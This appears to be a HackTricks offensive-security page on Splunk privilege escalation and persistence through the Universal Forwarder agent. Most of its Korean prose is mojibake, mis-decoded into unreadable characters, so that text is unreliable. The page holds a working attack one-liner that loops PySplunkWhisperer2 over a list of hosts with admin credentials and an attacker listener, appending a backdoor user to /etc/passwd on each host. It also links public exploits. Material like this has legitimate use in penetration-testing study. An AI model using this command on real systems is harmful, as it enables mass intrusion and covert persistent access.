Splunk LPE ๋ฐ ์ง์์ฑ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ธฐ๊ณ ๋ด๋ถ ๋๋ ์ธ๋ถ๋ฅผ ์ด๊ฑฐํ๋ ๋์ Splunk๊ฐ ์คํ ์ค์ธ ๊ฒ์ ๋ฐ๊ฒฌํ๋ฉด (ํฌํธ 8090), ์ด์ด ์ข๊ฒ๋ ์ ํจํ ์๊ฒฉ ์ฆ๋ช ์ ์๊ณ ์๋ค๋ฉด Splunk ์๋น์ค๋ฅผ ์ ์ฉํ์ฌ Splunk๋ฅผ ์คํ ์ค์ธ ์ฌ์ฉ์๋ก์ ์์ ์คํํ ์ ์์ต๋๋ค. ๋ฃจํธ๊ฐ ์คํ ์ค์ด๋ผ๋ฉด, ๋ฃจํธ ๊ถํ์ผ๋ก ์์นํ ์ ์์ต๋๋ค.
๋ํ ์ด๋ฏธ ๋ฃจํธ์ด๊ณ Splunk ์๋น์ค๊ฐ localhost์์๋ง ์์ ๋๊ธฐํ์ง ์๋ ๊ฒฝ์ฐ, Splunk ์๋น์ค์์ ๋น๋ฐ๋ฒํธ ํ์ผ์ ํ์น๊ณ ๋น๋ฐ๋ฒํธ๋ฅผ ํฌ๋ํ๊ฑฐ๋ ์๋ก์ด ์๊ฒฉ ์ฆ๋ช ์ ์ถ๊ฐํ ์ ์์ต๋๋ค. ๊ทธ๋ฆฌ๊ณ ํธ์คํธ์์ ์ง์์ฑ์ ์ ์งํ ์ ์์ต๋๋ค.
์๋ ์ฒซ ๋ฒ์งธ ์ด๋ฏธ์ง์์ Splunkd ์น ํ์ด์ง๊ฐ ์ด๋ป๊ฒ ์๊ฒผ๋์ง ๋ณผ ์ ์์ต๋๋ค.
Splunk Universal Forwarder Agent ์ทจ์ฝ์ ์์ฝ
์์ธํ ๋ด์ฉ์ https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ ํฌ์คํธ๋ฅผ ํ์ธํ์ธ์. ์ด๊ฒ์ ์์ฝ์ ๋๋ค:
์ทจ์ฝ์ ๊ฐ์: Splunk Universal Forwarder Agent (UF)๋ฅผ ๋์์ผ๋ก ํ๋ ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ ์์ด์ ํธ ๋น๋ฐ๋ฒํธ๋ฅผ ์ฌ์ฉํ์ฌ ์์ด์ ํธ๋ฅผ ์คํํ๋ ์์คํ ์์ ์์์ ์ฝ๋๋ฅผ ์คํํ ์ ์๊ฒ ํ์ฌ ์ ์ฒด ๋คํธ์ํฌ๋ฅผ ์ํ์ ๋น ๋จ๋ฆด ์ ์์ต๋๋ค.
์ฃผ์ ์ฌํญ:
- UF ์์ด์ ํธ๋ ๋ค์ด์ค๋ ์ฐ๊ฒฐ์ด๋ ์ฝ๋์ ์ง์๋ฅผ ๊ฒ์ฆํ์ง ์์ผ๋ฏ๋ก ๋ฌด๋จ ์ฝ๋ ์คํ์ ์ทจ์ฝํฉ๋๋ค.
- ์ผ๋ฐ์ ์ธ ๋น๋ฐ๋ฒํธ ํ๋ ๋ฐฉ๋ฒ์๋ ๋คํธ์ํฌ ๋๋ ํ ๋ฆฌ, ํ์ผ ๊ณต์ ๋๋ ๋ด๋ถ ๋ฌธ์์์ ์ฐพ๋ ๊ฒ์ด ํฌํจ๋ฉ๋๋ค.
- ์ฑ๊ณต์ ์ธ ์ทจ์ฝ์ ์ ์ฉ์ ์์๋ ํธ์คํธ์์ SYSTEM ๋๋ ๋ฃจํธ ์์ค์ ์ ๊ทผ, ๋ฐ์ดํฐ ์ ์ถ ๋ฐ ์ถ๊ฐ ๋คํธ์ํฌ ์นจํฌ๋ก ์ด์ด์ง ์ ์์ต๋๋ค.
์ทจ์ฝ์ ์คํ:
- ๊ณต๊ฒฉ์๊ฐ UF ์์ด์ ํธ ๋น๋ฐ๋ฒํธ๋ฅผ ํ๋ํฉ๋๋ค.
- Splunk API๋ฅผ ์ฌ์ฉํ์ฌ ์์ด์ ํธ์ ๋ช ๋ น์ด๋ ์คํฌ๋ฆฝํธ๋ฅผ ์ ์กํฉ๋๋ค.
- ๊ฐ๋ฅํ ์์ ์๋ ํ์ผ ์ถ์ถ, ์ฌ์ฉ์ ๊ณ์ ์กฐ์ ๋ฐ ์์คํ ์์์ด ํฌํจ๋ฉ๋๋ค.
์ํฅ:
- ๊ฐ ํธ์คํธ์์ SYSTEM/๋ฃจํธ ์์ค์ ๊ถํ์ผ๋ก ์ ์ฒด ๋คํธ์ํฌ๊ฐ ์์๋ฉ๋๋ค.
- ํ์ง๋ฅผ ํผํ๊ธฐ ์ํด ๋ก๊น ์ ๋นํ์ฑํํ ๊ฐ๋ฅ์ฑ.
- ๋ฐฑ๋์ด ๋๋ ๋์ฌ์จ์ด ์ค์น.
์ทจ์ฝ์ ์ ์ฉ์ ์ํ ์์ ๋ช ๋ น:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
์ฌ์ฉ ๊ฐ๋ฅํ ๊ณต๊ฐ ์ต์คํ๋ก์:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Splunk ์ฟผ๋ฆฌ ์ ์ฉ
์์ธํ ๋ด์ฉ์ https://blog.hrncirik.net/cve-2023-46214-analysis ๊ฒ์๋ฌผ์ ํ์ธํ์ธ์.
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


